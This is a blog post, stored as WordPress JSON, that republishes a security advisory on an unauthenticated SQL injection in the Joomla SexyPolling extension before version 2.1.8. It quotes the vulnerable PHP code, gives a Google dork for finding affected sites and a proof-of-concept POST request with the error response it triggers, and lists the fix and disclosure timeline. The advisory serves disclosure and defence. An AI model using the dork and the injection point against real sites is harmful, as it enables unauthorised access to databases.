{"id":24345,"date":"2022-05-11T23:18:59","date_gmt":"2022-05-11T19:18:59","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167093\/joomlasexypolling217-sql.txt"},"modified":"2022-05-15T09:39:12","modified_gmt":"2022-05-15T05:09:12","slug":"joomla-sexypolling-2-1-7-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/joomla-sexypolling-2-1-7-sql-injection\/","title":{"rendered":"Joomla SexyPolling 2.1.7 SQL Injection"},"content":{"rendered":"

# Exploit Title: Joomla Plugin SexyPolling 2.1.7 – SQLi
\n# Google Dork: intext:”Powered by Sexy Polling”
\n# Date: 2022-02-08
\n# Exploit Author: Wolfgang Hotwagner
\n# Vendor Homepage: https:\/\/2glux.com\/projects\/sexypolling
\n# Software Link: https:\/\/2glux.com\/downloads\/files\/free\/sexypolling_pack_2.1.7_2glux.com.zip
\n# Version: all versions below version 2.1.8
\n# Tested on: Debian Bullseye<\/p>\n

SexyPolling SQL Injection<\/p>\n

====================<\/p>\n

| Identifier: | AIT-SA-20220208-01|
\n| Target: | Sexy Polling ( Joomla Extension) |
\n| Vendor: | 2glux |
\n| Version: | all versions below version 2.1.8 |
\n| CVE: | Not yet |
\n| Accessibility: | Remote |
\n| Severity: | Critical |
\n| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |<\/p>\n

Summary<\/p>\n

========<\/p>\n

[Sexy Polling is a Joomla Extension for votes.](https:\/\/2glux.com\/projects\/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.<\/p>\n

Vulnerability Description<\/p>\n

====================<\/p>\n

In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.<\/p>\n

In lines 74 and 75 in the *site\/vote.php* code, the parameters are assigned without being checked:<\/p>\n

“`
\n$min_date_sent = isset($_POST[‘min_date’]) ? $_POST[‘min_date’].’ 00:00:00′ : ”;
\n$max_date_sent = isset($_POST[‘max_date’]) ? $_POST[‘max_date’].’ 23:59:59′ : ”;
\n“`<\/p>\n

These are later used unfiltered by the WHERE clause:<\/p>\n

“`
\n$query_toal = “SELECT
\nCOUNT(sv.`id_answer`) total_count,
\nMAX(sv.`date`) max_date,
\nMIN(sv.`date`) min_date
\nFROM
\n`#__sexy_votes` sv
\nJOIN
\n`#__sexy_answers` sa ON sa.id_poll = ‘$polling_id’
\nAND
\nsa.published = ‘1’
\nWHERE
\nsv.`id_answer` = sa.id”;<\/p>\n

\/\/if dates are sent, add them to query
\nif ($min_date_sended != ” && $max_date_sended != ”)
\n$query_toal .= ” AND sv.`date` >= ‘$min_date_sended’ AND sv.`date` <= ‘$max_date_sended’ “;
\n“`<\/p>\n

Proof Of Concept<\/p>\n

==============<\/p>\n

To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.<\/p>\n

HTTP-Request:
\n“`
\nPOST \/components\/com_sexypolling\/vote.php HTTP\/1.1<\/p>\n

Host: joomla-server.local
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:78.0) Gecko\/20100101 Firefox\/78.0
\nAccept: application\/json, text\/javascript, *\/*; q=0.01
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8
\nX-Requested-With: XMLHttpRequest
\nHTTP_X_REAL_IP: 1.1.1.1
\nContent-Length: 193
\nOrigin: joomla-server.local
\nConnection: close
\nReferer: joomla-server.local\/index.php\/component\/search\/
\nCookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6<\/p>\n

polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07’&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
\n“`<\/p>\n

The HTTP-Resoonse contains a mysql error:<\/p>\n

“`
\nHTTP\/1.1 500 Internal Server Error
\nDate: Wed, 15 Dec 2021 10:27:40 GMT
\nServer: Apache\/2.4.41 (Ubuntu)
\nSet-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=\/
\nExpires: Thu, 19 Nov 1981 08:52:00 GMT
\nCache-Control: no-cache
\nPragma: no-cache
\nSet-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=\/
\nContent-Length: 4768
\nConnection: close
\nContent-Type: application\/json<\/p>\n

<!DOCTYPE html>
\n<html lang=”en-gb” dir=”ltr”>
\n<head>
\n<meta charset=”utf-8″ \/>
\n<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ’00:00:00′ AND sv.`date` <= ‘2021-12-14 23:59:59” at line 12<\/title>
\n<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
\n<link href=”https:\/\/fonts.googleapis.com\/css?family=Open+Sans” rel=”stylesheet” \/>
\n“`<\/p>\n

Vulnerable Versions
\n================
\nAll versions below version 2.1.8<\/p>\n

Tested Versions
\n=============
\nSexy Polling ( Joomla Extension) 2.1.7<\/p>\n

Impact
\n======
\nAn unauthenticated attacker could inject and execute SQL commands on the database.<\/p>\n

Mitigation
\n=========
\nSexy Polling 2.1.8 fixed that issue<\/p>\n

Vendor Contact Timeline
\n====================
\n| 2021-12-14 | Unable to find a contact of the vendor |
\n| 2021-12-15 | Contacting Joomla Security Strike Team |
\n| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |
\n| 2022-01-01 | Sexy Polling releases 2.1.8 |
\n| 2022-04-08 | Public Disclosure |<\/p>\n

*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*<\/p>\n

Advisory URL
\n===========
\n[https:\/\/www.ait.ac.at\/ait-sa-20220208-01-sexypolling](https:\/\/www.ait.ac.at\/ait-sa-20220208-01-sexypolling)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Joomla Plugin SexyPolling 2.1.7 – SQLi # Google Dork: intext:”Powered by Sexy Polling” # Date: 2022-02-08 # Exploit Author: Wolfgang Hotwagner # Vendor Homepage: https:\/\/2glux.com\/projects\/sexypolling # Software Link: https:\/\/2glux.com\/downloads\/files\/free\/sexypolling_pack_2.1.7_2glux.com.zip # Version: all versions below version 2.1.8 # Tested on: Debian Bullseye SexyPolling SQL Injection ==================== | Identifier: | AIT-SA-20220208-01| | Target: | …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-24345","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24345","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=24345"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24345\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=24345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=24345"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=24345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}